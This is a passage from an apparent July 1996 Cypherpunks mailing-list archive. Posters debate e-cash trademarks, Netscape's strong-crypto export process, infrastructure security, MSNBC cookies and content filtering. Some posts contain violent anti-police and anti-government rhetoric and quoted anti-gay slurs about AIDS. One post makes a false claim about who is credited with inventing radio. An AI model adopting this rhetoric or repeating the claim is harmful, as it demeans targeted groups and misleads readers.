From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sat, 20 Jul 1996 01:14:09 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: #E-CASH: PRODUCT OR SERVICE?
In-Reply-To: <v02120d04ae147f5e5391@[192.0.2.1]>
Message-ID: <199607191139.HAA32618@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain



Lucky Green writes:

: Furthermore, to the best of my knowledge, DigiCash's
: Ecash is the only ecash that I am aware of. The other "ecashs" lack various
: properties of cash, as previously explained by Bryce.

This pretty well proves that ``ecash'' is a generic term--even though if 
it is correct the genus at the moment includes only one element--and
thus that the trademark ``Ecash''--if that is what the trademark
is--is awfully weak.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 20 Jul 1996 00:39:02 +0800
To: cypherpunks@toad.com
Subject: Re: New Infowarfare Panel
In-Reply-To: <31EE8BCE.50B@vail.tivoli.com>
Message-ID: <ekaBRD173w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Mike McNally <m5@vail.tivoli.com> writes:
> My personal recollection is that many of the InfoWar techniques we crafted
> during the Gulf War involved using high speed fighter-bomber aircraft to
> drop guided munitions on top of selected pieces of the communications
> infrastructure.

That didn't do much... Iraq's TCP/IP network proved too resilient for
U.S. bombs. Interestingly, one of the Russians who built it now works for
sprintnet.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Fri, 19 Jul 1996 18:46:58 +0800
To: Hallam-Baker <hallam@ai.mit.edu>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <31EF19A5.15FB@ai.mit.edu>
Message-ID: <Pine.SUN.3.95.960719073844.6676D-100000@netcom13>
MIME-Version: 1.0
Content-Type: text/plain


	Hallan-bakar:

On Fri, 19 Jul 1996, Hallam-Baker wrote:

> dangerous people arround besides the government and the government is the
	
	The most dangerous person is the world is a an armed
	law enforcement officer.  The least dangerous person is 
	that same law enforcement officer, dead.   

	The _only_ difference between a gang of thugs, and a government,
	is that the latter admit to being thugs, whilst the former deny
	that.  They both operate on the same prinicple -- steal from
	others, and kill those that oppose them.  

> only agency that is going to protect society from them. If you don't like 

	Governments are the agencies _most_ likely to abuse one's
	freedom.   << Take Northern Ireland, as an example of what 
	happens, when a government tries to pacify a region, by
	prohibiting everything.  >>

> living in a country where the police are armed to the teeth then move to
> the UK where there are very few armed police. Of course you will find that

	Note in passing that the British Army is more than perfectly
	willing to massacre the civilian population, it purportedly 
	protects.   Of course, that is in their capacity as an 
	occupation force, as part of their pacification procedures.  

> the price of freedom of mind is a minor restriction on your personal freedom,
> you won't be allowed a weapon either but that is the tradeoff. 

	Thanks, but if it is all the same to you, I'd rather live
	in a country where everybody  << including six year olds >>
	carry, and can use Uzi's, etc, as a matter of course.  

	Where weapons are just another thing to carry around, and 
	used to kill those who don't respect human rights --- like the
	British and American governments, for starters.  

        xan

        jonathon
        grafolog@netcom.com

	






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Fri, 19 Jul 1996 22:56:24 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: US versions of Netscape now available
In-Reply-To: <31EEEA3F.5015@netscape.com>
Message-ID: <199607191157.HAA00011@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Jeff Weinstein writes:

: Adam Back wrote:
: > Presumably as this latest netscape beta is freely distributable, once
: > it's out it will be on ftp.unimi.dsi.it, ftp.ox.ac.uk, etc, etc.
: 
:   Just a minor nit.  No netscape software is freely distributable.
: The license agreement does not allow people who download it
: to redistribute it.

But--to nitpick at the nit--nothing in the license agreement that I
can find forbids one from distributing it to others who are not
foreign persons and are not outside the United States.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 20 Jul 1996 00:59:09 +0800
To: cypherpunks@toad.com
Subject: Re: New Infowarfare Panel
In-Reply-To: <199607190403.WAA26099@zifi.genetics.utah.edu>
Message-ID: <46aBRD175w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


nobody@zifi.genetics.utah.edu (Anonymous) writes:

> David Sternlight wrote:
>
> <snip>
>
> >I'm talking about some of the information that started slowly leaking out
> >later, not the prime-time TV pyrotechnics.
>
> It doesn't "slowly leak out" as if there were some regrettable lapse in
> the plumbing. Someone has to commit the federal crime of military espionage!

SternFUN invented plumbing too???

(gasp)

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Sat, 20 Jul 1996 00:42:02 +0800
To: cypherpunks@toad.com
Subject: Re: (fwd) Re: US versions of Netscape now available---NOT
In-Reply-To: <199607182209.SAA13526@nrk.com>
Message-ID: <ckBBRD176w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


David Lesher <wb8foz@nrk.com> writes:
>           [IMAGE] DR. DAVID STERNLIGHT PROVIDES ECONOMIC AND STRATEGIC
>             PLANNINGCONSULTING SERVICES FOR HIGH-TECHNOLOGY FIRMS.
>
>    Strategic uncertainty is now the norm for the business environment.
>    Wrenching events such as the fall of the Soviet Union, major shifts in

What? SternFUN claims to be singlehandedly responsible for the fall of our
beloved Soviet Union?

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Fri, 19 Jul 1996 20:17:40 +0800
To: jsw@netscape.com
Subject: Re: US versions of Netscape now available
In-Reply-To: <31EEEA3F.5015@netscape.com>
Message-ID: <199607190709.IAA00119@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein <jsw@netscape.com> writes:
> Adam Back wrote:
> > Presumably as this latest netscape beta is freely distributable, once
> > it's out it will be on ftp.unimi.dsi.it, ftp.ox.ac.uk, etc, etc.
> 
>   Just a minor nit.  No netscape software is freely distributable.
> The license agreement does not allow people who download it
> to redistribute it.

Oh dear!  So I am incorrect... but wait, what about people like
sunsite northern europe (Imperial College London: ftp.doc.ic.ac.uk)
who already have a license to be a Netscape mirror site.  Would this
license allow them to distribute this latest 128 bit netscape beta
(were it to leak)?

Adam
--
#!/bin/perl -sp0777i<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<j]dsj
$/=unpack('H*',$_);$_=`echo 16dio\U$k"SK$/SM$n\EsN0p[lN*1
lK[d2%Sa2/d0$^Ixp"|dc`;s/\W//g;$_=pack('H*',/((..)*)$/)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jonathon Blake <grafolog@netcom.com>
Date: Fri, 19 Jul 1996 19:39:54 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Alternative Journalism
In-Reply-To: <ae1445400202100420d1@[205.199.118.202]>
Message-ID: <Pine.SUN.3.95.960719083136.7014B-100000@netcom4>
MIME-Version: 1.0
Content-Type: text/plain


	Tim:

On Thu, 18 Jul 1996, Timothy C. May wrote:

> questions the form asks.) That I am a felon has never stopped me from

	But you aren't a _convicted_ felon yet, Tim.  That makes
	a _big_ difference. 

        xan

        jonathon
        grafolog@netcom.com


	AOL coasters are unique, and colourful.  
		Collect the entire set. 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sat, 20 Jul 1996 00:17:23 +0800
To: paquin@netscape.com
Subject: Re: Netscape download requirements
In-Reply-To: <31EEDA69.31D8@netscape.com>
Message-ID: <199607191244.IAA00368@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Tom Paquin writes:

: sameer wrote:
: > 
: > Have you considered selling this export verification system?
: 
: No.  I don't have redistribution rights to all of it.  If
: someone were really interested, I'd talk to them, but the
: government would probably need to be told before any tech transfer
: took place, I'd bet.
: 
: Also, our govt permission is pretty specialized; I don't think
: anyone can just go use it unless they are willing to brave those
: untested waters I keep getting reminded about.

Would it be possible to get a copy of the terms of the written
permission that I gather Netscape has received from the government?
Or is this another area where the government insists on obscurity?

(I do want to thank Netscape--and especially Tom Weinstein who tried
to give me a lot of assistance--for making the downloading possible.
On the other hand, I certainly don't think that we owe any thanks to
the government agencies that made all this rigamarole necessary.)

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Barber <jeffb@issl.atl.hp.com>
Date: Sat, 20 Jul 1996 01:36:22 +0800
To: david@sternlight.com (David Sternlight)
Subject: Re: Gorelick testifies before Senate, unveils new executive order
In-Reply-To: <v03007601ae14f5fa1d3d@[192.187.162.15]>
Message-ID: <199607191255.IAA00550@jafar.issl.atl.hp.com>
MIME-Version: 1.0
Content-Type: text/plain


David Sternlight writes:
> 
> At 8:04 PM -0700 7/18/96, Jeff Barber wrote:

> >> Now THAT is apples and oranges. The security of, say, IBM's, or the FAA's,
> >> or AT&T's domestic computer networks has little to do with crypto export
> >> policy.
> >
> >Big companies like IBM, AT&T, etc. have *international* networks.  Hence,
> >the connection to the crypto export policy, which prevents comprehensive
> >security programs from being deployed.  As a "senior techinical executive"
> >(oxymoron alert) to Fortune 50 companies, I assume you know that and are
> >simply choosing to ignore it for the sake of your current argument.
> 
> There are exceptions to ITAR for this purpose (overseas offices of US
> companies). In addition, like the argument that we shouldn't jail anyone
> until all social evils are cured, your argument fails. IBM can secure their
> domestic network (at least) without having to secure their global network.
> As for your suggestion that I am special pleading, that's just unsupported
> defamation. I suppressed nothing--it is you who are omitting the facts I
> mention just above. Only a fool would accuse another of special pleading
> when the possibility the accuser doesn't understand the argument, or have
> all the data exists. If you have any integrity you'll apologize.

Yeah, right.  You clearly chose not to address the requirements of
international company networks in your argument.  You admit that such
companies have international networks, and that you knew it.  It was
obviously relevant and you could have and should have addressed it.
The fact that you chose not to speaks to your own lack of integrity.
To gain the upper hand in the argument is clearly your supreme objective;
any point that doesn't fit the argument is simply not addressed.


> >> >Putting the government in charge of fixing security problems is likely
> >> >to result in an infrastructure optimized for surveillance, as we've seen
> >> >with other government-sponsored initiatives (Clipper, DigitalTelephony,
> >> >etc.).
> >>
> >> The subject matter of the Commission's inquiry has more to do with
> >> authentication than message encryption, and more to do with infrastructure
> >> and network security. And as it happens there is no problem getting export
> >> licenses for authentication-only software with as secure a key as you like
> >> and no escrow. RIPEM/SIG did it years ago. You aren't even on the same page
> >> as this issue.
> >
> >There is more to security than authentication, as I'm sure you also know
> >but are choosing to ignore.
> 
> Another attempt to accuse, read minds, and impute motives. We're talking
> about securing networks such as communications, transportation, and power,
> against hacker attacks. Authentication is the core, not encryption. A main
> problem is the spoofer instructing the network to self-destruct. Long-key
> authentication can address this when coupled with the safeguarding of keys.
> and some system precautions not related to encryption.

In the last round, you mentioned financial networks.  You conveniently
left those out here.  I argue that these as well as others require
encryption.  Again, the fact that you fail to exclude any "inconvenient"
scenarios in whatever happens to be the matter under discussion destroys
your credibility (well, it would have, if you had any amongst the members
of this list).


> > Authentication alone may suffice in some
> >situations but clearly not all.
> 
> So what? What part of "more to do with....than" don't you understand? I
> never said "all"--that's a straw man to try to shift the ground of the
> discussion rather than attempting a direct refutation.

On the contrary, you are the one who responds to each objection by 
pointing out that there is at least one situation where the current
regulations do not completely rule out solutions.  As one who has dealt
with security problems in the trenches, I have been involved in numerous
attempts to tiptoe through the mine-field of crypto regulations in search
of solutions.  I would prefer not to have to do so as it's a huge waste
of my time, and my (and everyone else's) money and other resources.


> >> Again, you are trying to fight a different battle in the wrong arena.
> >> This isn't about your ability to encrypt your traffic. It's about securing
> >> the domestic infrastructure against information warfare. I know this is
> >> beginning to sound tiresome, but you'd better do your homework.

> >  This isn't a different battle, though; it's all interwoven.
> 
> So what? Everything is connected to everything else.

Ouch, David, stop it.  Once again, I'm skewered by your rapier wit.


> >I don't want the government responsible for "securing the domestic
> >infrastructure..." for the same reason that I don't want them telling
> >me where or to whom I can sell crypto.

> >  They haven't any right to, IMO,
> 
> Read the Constitution.

I have.  News flash for David: not everyone agrees on the meaning of
various clauses in the Constitution.  Believe it or not, reasonable
people hold opinions that differ from the gospel-according-to-Sternlight.
The constitution means whatever the Supreme Court says it means and
that changes from time to time even though the constitution generally
does not.


> >and besides, I don't trust them to look out for my interests.
> 
> At least some of one's interests we might both agree. There's the old joke
> "I'm from Washington and I'm here to help you."

Unfortunately, you seem to believe them most of the time, and want us
to believe them too in this case, while I choose to believe them rarely
if ever.


As this debate has now deteriorated to the "Sternlight claims
defamation, demands apology" point, and the substantive content is
quickly approaching zero, I'll try to make this my last post.  (List
breathes collective sigh of relief.)


-- Jeff




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Sat, 20 Jul 1996 00:31:07 +0800
To: Joel McNamara <joelm@eskimo.com>
Subject: Re: MSNBC and cookies
In-Reply-To: <199607190426.VAA10722@mail.eskimo.com>
Message-ID: <199607191300.JAA00488@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Joel McNamara writes:

: In attempting to check out different Net media coverage of TWA 800, it
: appears the msnbc.com site won't let you in without a cookie.  Repeated
: cookie cancels with Navigator 3.0 drop you into an indigestive loop of the
: server continuing to try to force feed you cookies.  When you finally click
: OK, you get in.
: 
: Am I spacing, or is this the first site anyone's stumbled on that requires a
: cookie for access?  I've never been shut out of a site for canceling a
: cookie.  The first cookie request does have a user ID field.  If the server
: (or client) isn't misbehaving, this seems like a wee bit of a privacy issue.
: 
: I tried accessing the page (http://www.msnbc.com) on 7/18/96 around 9:15 PM
: PDT.  Anyone care to confirm this.

I can confirm it.  I never gave them the cookie.  Had one hell of a
job backing out.  I don't know what would have happened if I had set
my cookies file to be read only.

It's a nuisance, but I suppose there is no reason that a commercial
service can't do such a thing.  But what happens when one tries to
access it with Lynx?

I too am using Navigator 3.0 (the new beta with strong crypto)--I
wonder if people who use MS's explorer or whatever it is called are
faced with the same problems?

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sat, 20 Jul 1996 01:20:48 +0800
To: cypherpunks@toad.com
Subject: Inventor of radio...
Message-ID: <199607191414.JAA25284@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi all,

I would like to correct a misconception about who is credited with the
invention of radio. Nikola Tesla has held the credit for the creation since
the resolution of the original lawsuit in the mid-80's.

Tata.

                                                    Jim Choate

Forwarded message:

> Subject: Re: Mail-order Ph.D.'s
> From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> Date: Fri, 19 Jul 96 07:37:24 EDT
> 
> He also invented the radio, but Marconi+Popov stole the credit from him.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: weffross@counsel.com (Walter A Effross -- American Univ. - Washington )
Date: Sat, 20 Jul 1996 01:06:46 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <9607191331.AA13063@ad0.reach.com>
MIME-Version: 1.0
Content-Type: text/plain




 To:	cypherpunks@toad.com		Inet 	


unsubscribe weffross@counsel.com

Thanks!






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Sat, 20 Jul 1996 00:57:41 +0800
To: cypherpunks@toad.com
Subject: Re: Gorelick testifies before Senate, unveils new executive order
Message-ID: <2.2.32.19960719133458.00830ef0@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


David Sternlight writes:

> Here's the problem in a nutshell: Everyone who has looked at our systems,
> from Cliff Stoll

A *famous* security expert.

>on to blue ribbon scientific commissions, 

The last of which recommended that crypto be entirely deregulated.

> Serious studies have shown that the kinds of protections to make the
> systems we depend on robust against determined and malicious attackers (say
> a terrorist government, or one bent on doing a lot of damage in retaliation
> for one of our policies they don't like), have costs beyond the capability
> of individual private sector actors.

Defense is cheaper than attack in encryption because it is easier to make
coherent information incoherent (see Usenet) than it is to make incoherent
information coherent.

> In such a case, where public benefits from government action greatly exceed
> public (taxpayer) costs, and the private sector cannot (or will not) act
> unaided, the classical basis for government action in the interests of the
> citizenry exists. It's the economist's "lighthouse" argument.

But since the Internet and the WANs and LANs that you are talking about are
all "private value-added networks," the benefits of enhanced security a
fully captured by the users of those networks and there is no "public goods"
problems.  (BTW, there were private lighthouses too.)  

Note too that major money center banks disagree with you.  There was a
recent article about the fact that they are not reporting computer
intrusions and just fixing the problems themselves.  They don't seem
interested in official security "help" with all the disadvantages (publicity
and security leaks) that it brings. 

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Troy Denkinger <troy_d@ix.netcom.com>
Date: Sat, 20 Jul 1996 02:20:55 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
Message-ID: <2.2.32.19960719154550.0073d960@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:07 PM 7/18/96 -0700, you wrote:

[Cerridwyn Llewyellyn's text snipped]

[Lucid argument snipped, I was with you until right around here]

>I see nothing wrong in this. Anyone who disagrees is, of course, free to
>set his filters differently, but not to insist that my filters be changed.
>And the government is not free to pass any laws about what filter sites can
>and can't do.

We have an interesting problem here, though.  You say that the government
has no right to tell you how to set your filter; no doubt about that, imo.
However, most people who use these filters are going to be quite happy to
allow some corporate entity the privilege of setting their filters for them
and, if the consumer should ask about criteria and such, they are told that
that's a trade secret.  So, people will be allowing a corporate entity that
exists for profit to set their filters for them.  This is a very scary thing
and perhaps even more frightening than having the government do it.  I think
that the people on this list tend to maintain a healthy scepticism toward
the various TLAs, but we have to remember that a large, multinational
corporation has not even got a sense of a greater "national good" or even
"national security" to guide it.

[snip]

I'll preface my following remarks by saying that I'm not a libertarian.

>Some parents simply get tired of spending time each night trying to undo
>the propaganda taught in many public school, such as books like "I Have Two
>Mommies." Many of these parents eventually give up and put their kids in
>religious or private schools (even though they continue to pay taxes for
>schools their own children are no longer using).

First point first.  The "propaganda" taught in schools is generally aimed at
teaching our children how to think.  Perhaps rote learning and cultural
naivete make us all comfortable at night and let us sleep better, but in a
world where critical thinking is undervalued I'd rather have my and my
childrens' views challenged than constantly affirmed.  (Btw, I have no
children at this moment, so it's quite possible to contend I'm talking out
my ass here; time will tell.)  

Public school funding is way off topic, so I'll concede your "point" and let
it slide.

[Now the meat of the queer bashing, how charming.  Sad to see you sully what
was a decent argument up to this point with ignorant foolishness]

>Queers are, as far as I'm concerned, perfectly free to practice their
>AIDS-spreading practices to any and all receptive anuses they can find, but
>I eschew this lifestyle and will fight to the death for this right to avoid
>their practices from being forced on me or my children (if I had any, which
>I don't).

When was the last time a homosexual attempted to force their practices on
you?  I'll leave your fictitious children out of it for the moment.  Are you
an active eschewer or simply a theoretical eschewer?  Have you ever been hit
on by a gay person?  I have; I told them I wasn't gay and that was that.  No
one forced their "AIDS-spreading practices" on me.

>I think of AIDS as "evolution in action." Retroviruses which  have existed
>for millenia now find new vectors for spreading in our population. I cry no
>tears for those dying of AIDS, and work to reduce to tax dollars spent on
>such things as "AIDS research." Let those who introduced the new vector pay
>for the research.

I usually read your posts to this list and often find them insightful,
however the above statement leaves me wondering if some ignoramus has taken
control of your keyboard or if the above was a simple, but remarkable,
typing error.  

Following your reasoning, it's also proper to say that cancer and heart
disease as well as violent crime resulting in death of a victim are also
"evolution in action" isn't it?  Your assertions are absurd and unfounded.
Your final point that those who "introduced the new vector" should pay for
the research for a cure continues to spotlight your inchoate notions on this
topic.  Pray tell, who introduced the vector?  Who was responsible for the
spread of the virus?  Who are the victims of this disease?  Who are the
future victims of this disease--do they have to pay because obviously
they're engaged in some kind of risky behaviour?  What part does an
unresponsive worldwide health structure have to pay?  How responsible are
you for the social blight that leads the underclasses to participate in
risky behaviour through hopelessness or lack of education?

Really, Mr. May, look further than your own front yard for a change.  You
live in a world -- welcome to it.

Troy Denkinger





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven L Baur <steve@miranova.com>
Date: Sat, 20 Jul 1996 07:22:01 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: MSNBC and cookies
In-Reply-To: <199607191300.JAA00488@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <m2zq4w2ngl.fsf@deanna.miranova.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> "Peter" == Peter D Junger <junger@pdj2-ra.F-REMOTE.CWRU.Edu> writes:
 (About accessing http://www.msnbc.com/ )
Peter> I can confirm it.  I never gave them the cookie.  Had one hell of a
Peter> job backing out.  I don't know what would have happened if I had set
Peter> my cookies file to be read only.

Peter> It's a nuisance, but I suppose there is no reason that a
Peter> commercial service can't do such a thing.  But what happens
Peter> when one tries to access it with Lynx?

You lose!

Typical Microsoft arrogance:
                                                               Welcome to MSNBC


                              Welcome to MSNBC

                                   [LINK]

















http://www.msnbc.com/default.asp?


(and the links don't work of course).

Since Lynx is the only browser blind^H^H^H^H^Hvisually challenged
people can use, failure to make a site readable with Lynx is a clear
case of discrimination.
-- 
steve@miranova.com baur
Unsolicited commercial e-mail will be proofread for $250/hour.
Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone
except you in November.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: elfgard@pooh-corner.com
Date: Sat, 20 Jul 1996 01:56:49 +0800
To: "'jti@i-manila.com.ph>
Subject: Re: Reverse Engineer
Message-ID: <199607191411.KAA06664@piglet.pooh-corner.com>
MIME-Version: 1.0
Content-Type: text/plain




> What do you mean by "reverse engineer?" I have heard this word several times especially in the world of hacking, but... can someone tell me what it really meant?

Interesting question.  
Hmmm...

I would answer this question for you but then I would have to kill 
you.

That is basically like asking a car thief to tell yuo about how he 
breaks into cars and what cars hes broken into lately.

My suggestion to you is to pick up one of those MEGA lame books like 
"What is a Cyberpunk!" and read that.  It may not tell you shit, but 
it will give you a broad understanding about what you want to know.

Elfgard
*The One and Only*
 
elfgard@netlite.com
http://www.netlite.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 20 Jul 1996 07:33:12 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
Message-ID: <ae150e930a0210046d94@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:48 AM 7/19/96, Simon Spero wrote:
>On Thu, 18 Jul 1996, Timothy C. May wrote:
>> Filtering is not "wrong," Cerridwyn, it is a rational response to garbage
>> being spewed constantly. I filter lots of items. I read "Scientific
>> American" and "The Economist" because they filter (or "censor," in the
>> sense some are objecting to here) nonsense about "queer rights" and
>
>Actually, the Economist has, er,  come out strongly in favour of gay
>rights on numerous occasions- most recently on the issue of same sex
>marriages.

Sure, and I didn't exactly state what my position _is_ on so-called queer
rights. I said I have no interest in hearing nonsense about it, e.g., the
drumbeat of propaganda, etc.

Of course, it should come as no surprise that I believe everyone has the
legal right to refuse to associate with anyone. Thus, a shop owner or
employer, in my view, has every right to refuse service or employment to
whomever he wishes.

While many may not _like_ this (including me, when I am banned from certain
businesses, as I am), it is part and parcel of liberty.

--Tim May


Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 20 Jul 1996 09:42:45 +0800
To: cypherpunks@toad.com
Subject: Re: Filtering out Queers is OK
Message-ID: <ae1510250b021004cc14@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:45 PM 7/19/96, Troy Denkinger wrote:

>We have an interesting problem here, though.  You say that the government
>has no right to tell you how to set your filter; no doubt about that, imo.
>However, most people who use these filters are going to be quite happy to
>allow some corporate entity the privilege of setting their filters for them
>and, if the consumer should ask about criteria and such, they are told that
>that's a trade secret.  So, people will be allowing a corporate entity that

And? After all, when Coca Cola offers only one formula for Coke (these
days, at least) and yet keeps the formula a treade secret, is this not
similiarly restrictive of "choice"? The fact is that consumers never have
full freedom about what other agents or companies offer to trade to them.


>exists for profit to set their filters for them.  This is a very scary thing
>and perhaps even more frightening than having the government do it.  I think
>that the people on this list tend to maintain a healthy scepticism toward
>the various TLAs, but we have to remember that a large, multinational
>corporation has not even got a sense of a greater "national good" or even
>"national security" to guide it.

Magazines, newspapers, and other such sources routinely make editorial
decisions about what to cover. And no, they do not necessarily publicize
the inner workings of their editorial process.

Are we to be "scared" that "Newsweek," for example, has their own filters
and is a multinational corporation (gulp)? "Newsweek" has many secrets of
their own; the most recent being that their own Joe Klein was the author of
the anonymous novel "Primary Colors," and the publisher knew it.

People and companies have their own agendas, their own filters, and their
own reasons for doing things they do. Get used to it.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Sandy Sandfort <sandfort@crl.com>
Date: Sat, 20 Jul 1996 20:13:17 +0800
To: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <2.2.32.19960719063324.00695be4@gonzo.wolfenet.com>
Message-ID: <Pine.SUN.3.91.960719100549.17836F-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
                          SANDY SANDFORT
 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C'punks,

I wrote:

> >[In California] anyone found in your house at night is
> >presumptively a threat to which you may respond with deadly 
> >force.  Shoot on sight, in other words.

To which Cerridwyn responded:
 
> I find it hard to believe "anyone".  If "anyone" happens to be
> law enforcement, as has been proven again and again: yer screwed
> no matter what (either dead or in jail forever). 

Hard to believe or not, that's the presumption.  Now in law,
it's a rebuttable presumption, but it's still a get-out-of-jail
card if you did not know the shadow at the end of the call was 
a cop who was LAWFULLY in your house.  If that last sentence
was not clear, please realize that cops who knowingly break the 
law lose most of the special immunities their status normally 
gives them.  The jury will decide if you acted reasonably, of
course, but the presumption is that you did until the cops can
rebut it with sufficient evidence.

In any event, I still think it's better to be judged by twelve 
than to be carried by six, n'est-ce pas?


 S a n d y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Paquin <paquin@netscape.com>
Date: Sat, 20 Jul 1996 19:31:30 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape 3.0B US version MD5 (was: Re: overseas PGPfone and Netscape)
In-Reply-To: <4slmrl$a80@abraham.cs.berkeley.edu>
Message-ID: <31EFC546.50D6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


> > what's stopping netscape from embedding the info you
> > provide in the binary before shipping it to you, so that if it shows
> > up on hacktic, they know who did it?

Nothing, but we're not doing that, and nobody has asked us to.
If we did something like that, I imagine you'd know up front.

> Their file delivery CGI could use some work... 

No doubt.

> no reason I can see to
> offer the filename 'pick.cgi' for everything.  

We've been busy getting the damn process to work and get
approved.  It's simple this way.  There's one CGI and
when you run it, it produces output and ergo that's the
"filename" you see.  With some time, we could get clever
and synthesize the name you want.  It's not the highest
of priorities in this process right now.


--
Tom Paquin            Netscape Communications Corp
about:paquin




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Paquin <paquin@netscape.com>
Date: Sat, 20 Jul 1996 22:41:52 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape download requirements
